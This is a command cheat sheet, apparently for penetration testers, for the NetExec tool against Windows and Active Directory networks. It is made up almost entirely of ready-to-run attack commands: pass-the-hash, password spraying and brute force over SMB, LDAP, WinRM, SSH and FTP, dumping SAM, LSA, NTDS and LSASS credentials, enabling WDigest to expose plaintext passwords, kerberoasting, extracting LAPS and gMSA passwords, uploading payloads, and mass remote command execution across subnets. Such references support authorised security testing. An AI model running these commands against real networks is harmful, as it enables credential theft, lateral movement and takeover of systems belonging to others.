Skip to main content

Overview

NetExec (nxc) is the successor to CrackMapExec (cme). Multi-protocol Swiss army knife for pentesting Windows/Active Directory environments. Supports SMB, LDAP, WinRM, MSSQL, SSH, FTP, and RDP from a single tool with a unified interface.
  • CrackMapExec is deprecated — use nxc instead of crackmapexec/cme
  • Handles password spraying, credential validation, command execution, and post-exploitation across protocols
  • Built-in database tracks all discovered credentials and hosts

Installation

pipx install git+https://github.com/Pennyw0rth/NetExec

apt (Kali)

sudo apt install netexec

From source

git clone https://github.com/Pennyw0rth/NetExec
cd NetExec
pipx install .
Verify: 
nxc --version

Authentication Methods

All protocols share the same authentication flags. 
# Password
nxc smb <IP> -u user -p 'Password123'

# NTLM hash (Pass-the-Hash)
nxc smb <IP> -u user -H 'aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76'

# NTLM hash (NT only)
nxc smb <IP> -u user -H '5fbc3d5fec8206a30f4b6c473d68ae76'

# Kerberos ticket (ccache)
export KRB5CCNAME=/tmp/user.ccache
nxc smb <IP> -u user --use-kcache

# Kerberos with password (request TGT)
nxc smb <IP> -u user -p 'Password123' -k

# NULL session
nxc smb <IP> -u '' -p ''

# Guest session
nxc smb <IP> -u 'guest' -p ''

# Domain authentication
nxc smb <IP> -u user -p 'Password123' -d DOMAIN.LOCAL

# Local authentication
nxc smb <IP> -u user -p 'Password123' --local-auth

# Credential files
nxc smb <IP> -u users.txt -p passwords.txt
nxc smb <IP> -u users.txt -p passwords.txt --continue-on-success

SMB

Check Access and Signing

# Check if user is admin
nxc smb <IP> -u user -p 'Password123'
# Output shows (Pwn3d!) if admin

# Check SMB signing
nxc smb <IP> --gen-relay-list unsigned.txt

# Enumerate hosts on a subnet
nxc smb 10.10.10.0/24

Enumerate Shares

nxc smb <IP> -u user -p 'Password123' --shares

Spider Shares

nxc smb <IP> -u user -p 'Password123' -M spider_plus

# Spider with output to JSON
nxc smb <IP> -u user -p 'Password123' -M spider_plus -o DOWNLOAD_FLAG=true

List Users

nxc smb <IP> -u user -p 'Password123' --users

Enumerate Logged-On Users

nxc smb <IP> -u user -p 'Password123' --loggedon-users

Enumerate Disks

nxc smb <IP> -u user -p 'Password123' --disks

RID Brute Force

nxc smb <IP> -u user -p 'Password123' --rid-brute
nxc smb <IP> -u user -p 'Password123' --rid-brute 10000

# With NULL session
nxc smb <IP> -u '' -p '' --rid-brute

Pass-the-Hash

nxc smb <IP> -u user -H 'NTLM_HASH'
nxc smb 10.10.10.0/24 -u administrator -H 'NTLM_HASH'

SAM Dump

nxc smb <IP> -u user -p 'Password123' --sam

LSA Dump

nxc smb <IP> -u user -p 'Password123' --lsa

NTDS Dump (Domain Controller)

# Full NTDS dump
nxc smb <DC_IP> -u user -p 'Password123' --ntds

# Using VSS method
nxc smb <DC_IP> -u user -p 'Password123' --ntds vss

# Filter specific user
nxc smb <DC_IP> -u user -p 'Password123' --ntds --user targetuser

Command Execution

# CMD execution
nxc smb <IP> -u user -p 'Password123' -x 'whoami'

# PowerShell execution
nxc smb <IP> -u user -p 'Password123' -X 'Get-Process'

# Choose exec method
nxc smb <IP> -u user -p 'Password123' -x 'whoami' --exec-method smbexec
nxc smb <IP> -u user -p 'Password123' -x 'whoami' --exec-method mmcexec
nxc smb <IP> -u user -p 'Password123' -x 'whoami' --exec-method atexec
nxc smb <IP> -u user -p 'Password123' -x 'whoami' --exec-method wmiexec

Put / Get Files

nxc smb <IP> -u user -p 'Password123' --put-file /tmp/payload.exe '\\Windows\\Temp\\payload.exe'
nxc smb <IP> -u user -p 'Password123' --get-file '\\Windows\\Temp\\secret.txt' /tmp/secret.txt

LDAP

Enumerate Users

nxc ldap <DC_IP> -u user -p 'Password123' --users

Enumerate Groups

nxc ldap <DC_IP> -u user -p 'Password123' --groups

Enumerate Computers

nxc ldap <DC_IP> -u user -p 'Password123' --computers

Enumerate Domain Trusts

--trusted-for-delegation lists unconstrained-delegation accounts, not trusts (see “Find Delegation” below). NetExec has no dedicated trust flag — collect trusts via BloodHound: 
nxc ldap <DC_IP> -u user -p 'Password123' --bloodhound -c Trusts --dns-server <DC_IP>

Password Hunting (Description Field)

nxc ldap <DC_IP> -u user -p 'Password123' -M get-desc-users

Kerberoastable Users

nxc ldap <DC_IP> -u user -p 'Password123' --kerberoasting output.txt

AS-REP Roastable Users

nxc ldap <DC_IP> -u user -p 'Password123' --asreproast output.txt

Find Delegation

nxc ldap <DC_IP> -u user -p 'Password123' --trusted-for-delegation

MachineAccountQuota (MAQ)

nxc ldap <DC_IP> -u user -p 'Password123' -M maq

Password Policy

nxc smb <DC_IP> -u user -p 'Password123' --pass-pol

LAPS Passwords

nxc ldap <DC_IP> -u user -p 'Password123' -M laps

gMSA Passwords

nxc ldap <DC_IP> -u user -p 'Password123' --gmsa

Enumerate ADCS

nxc ldap <DC_IP> -u user -p 'Password123' -M adcs

WinRM

Check Access

nxc winrm <IP> -u user -p 'Password123'
# Output shows (Pwn3d!) if user can execute commands

Command Execution

# CMD
nxc winrm <IP> -u user -p 'Password123' -x 'whoami'

# PowerShell
nxc winrm <IP> -u user -p 'Password123' -X 'Get-Process'

Pass-the-Hash

nxc winrm <IP> -u user -H 'NTLM_HASH' -x 'whoami'

MSSQL

Authentication

# SQL authentication
nxc mssql <IP> -u sa -p 'Password123'

# Windows authentication
nxc mssql <IP> -u user -p 'Password123' -d DOMAIN.LOCAL

# Local Windows auth
nxc mssql <IP> -u user -p 'Password123' --local-auth

Command Execution (xp_cmdshell)

nxc mssql <IP> -u sa -p 'Password123' -x 'whoami'
nxc mssql <IP> -u sa -p 'Password123' -X 'Get-Process'

Enumeration

# Enumerate databases
nxc mssql <IP> -u sa -p 'Password123' -q 'SELECT name FROM sys.databases'

# Run arbitrary SQL
nxc mssql <IP> -u sa -p 'Password123' -q 'SELECT @@version'

SSH

Authentication Check

nxc ssh <IP> -u user -p 'Password123'

Brute Force

nxc ssh <IP> -u users.txt -p passwords.txt --continue-on-success

Command Execution

nxc ssh <IP> -u user -p 'Password123' -x 'id'

FTP

Authentication Check

nxc ftp <IP> -u user -p 'Password123'

Anonymous Check

nxc ftp <IP> -u anonymous -p ''

Brute Force

nxc ftp <IP> -u users.txt -p passwords.txt --continue-on-success

RDP

Check Access

nxc rdp <IP> -u user -p 'Password123'

Check NLA

nxc rdp <IP> -u user -p 'Password123' --nla-screenshot

Screenshot

nxc rdp <IP> -u user -p 'Password123' --screenshot

Password Spraying

Across Protocols

# SMB spray
nxc smb 10.10.10.0/24 -u users.txt -p 'Spring2024!' --continue-on-success

# LDAP spray
nxc ldap <DC_IP> -u users.txt -p 'Spring2024!' --continue-on-success

# WinRM spray
nxc winrm <IP> -u users.txt -p 'Spring2024!' --continue-on-success

# SSH spray
nxc ssh <IP> -u users.txt -p passwords.txt --continue-on-success

# Multiple passwords against multiple users
nxc smb <IP> -u users.txt -p passwords.txt --continue-on-success

Jitter and Delay

nxc smb <IP> -u users.txt -p 'Spring2024!' --jitter 3

Lockout Awareness

Always check the password policy first: 
nxc smb <DC_IP> -u user -p 'Password123' --pass-pol
Then spray one password at a time with --continue-on-success and wait between attempts based on the lockout observation window.

Modules

List All Modules

nxc smb -L
nxc ldap -L
nxc winrm -L
nxc mssql -L

Module Info

nxc smb -M spider_plus --options

Useful Modules

# Spider shares and output JSON
nxc smb <IP> -u user -p 'Password123' -M spider_plus

# Get network connections
nxc smb <IP> -u user -p 'Password123' -M get_netconnections

# Enable WDigest (plaintext creds in memory)
nxc smb <IP> -u user -p 'Password123' -M wdigest -o ACTION=enable

# Dump LSASS with lsassy
nxc smb <IP> -u user -p 'Password123' -M lsassy

# Dump LSASS with nanodump
nxc smb <IP> -u user -p 'Password123' -M nanodump

# Dump LSASS with procdump
nxc smb <IP> -u user -p 'Password123' -M procdump

# Dump LSASS with lsassy (NetExec has no mimikatz module)
nxc smb <IP> -u user -p 'Password123' -M lsassy

# Enable RDP
nxc smb <IP> -u user -p 'Password123' -M rdp -o ACTION=enable

# Check WebDAV
nxc smb <IP> -u user -p 'Password123' -M webdav

# NTDS dump via ntdsutil
nxc smb <DC_IP> -u user -p 'Password123' -M ntdsutil

# Enumerate AV products
nxc smb <IP> -u user -p 'Password123' -M enum_av

Output and Logging

Log to File

nxc smb <IP> -u user -p 'Password123' --log output.log

NetExec Database (nxcdb)

All results are automatically stored in the nxcdb SQLite database. 
# Launch database interface
nxcdb

# Inside nxcdb
help
proto smb
creds
hosts

Export Results

# Export credentials
nxcdb
proto smb
creds
export creds csv /tmp/creds.csv

# Export hosts
hosts
export hosts csv /tmp/hosts.csv

Verbose Output

nxc smb <IP> -u user -p 'Password123' --verbose

Common One-Liners

# Find all hosts where user is local admin
nxc smb 10.10.10.0/24 -u user -p 'Password123'

# Spray one password across a subnet
nxc smb 10.10.10.0/24 -u users.txt -p 'Spring2024!' --continue-on-success

# Dump all domain hashes from DC
nxc smb <DC_IP> -u admin -p 'Password123' --ntds

# Find hosts with SMB signing disabled (relay targets)
nxc smb 10.10.10.0/24 --gen-relay-list unsigned.txt

# Enumerate shares across a subnet
nxc smb 10.10.10.0/24 -u user -p 'Password123' --shares

# Extract LAPS passwords
nxc ldap <DC_IP> -u user -p 'Password123' -M laps

# Find AS-REP roastable users
nxc ldap <DC_IP> -u user -p 'Password123' --asreproast asrep.txt

# Find Kerberoastable users
nxc ldap <DC_IP> -u user -p 'Password123' --kerberoasting kerb.txt

# Check for null sessions across subnet
nxc smb 10.10.10.0/24 -u '' -p '' --shares

# Mass command execution on pwned hosts
nxc smb 10.10.10.0/24 -u admin -H 'NTLM_HASH' -x 'whoami' --exec-method smbexec

# RID brute with null session
nxc smb <DC_IP> -u '' -p '' --rid-brute 10000

# Dump SAM on all hosts where you are admin
nxc smb 10.10.10.0/24 -u admin -p 'Password123' --sam

# Spider all readable shares for sensitive files
nxc smb 10.10.10.0/24 -u user -p 'Password123' -M spider_plus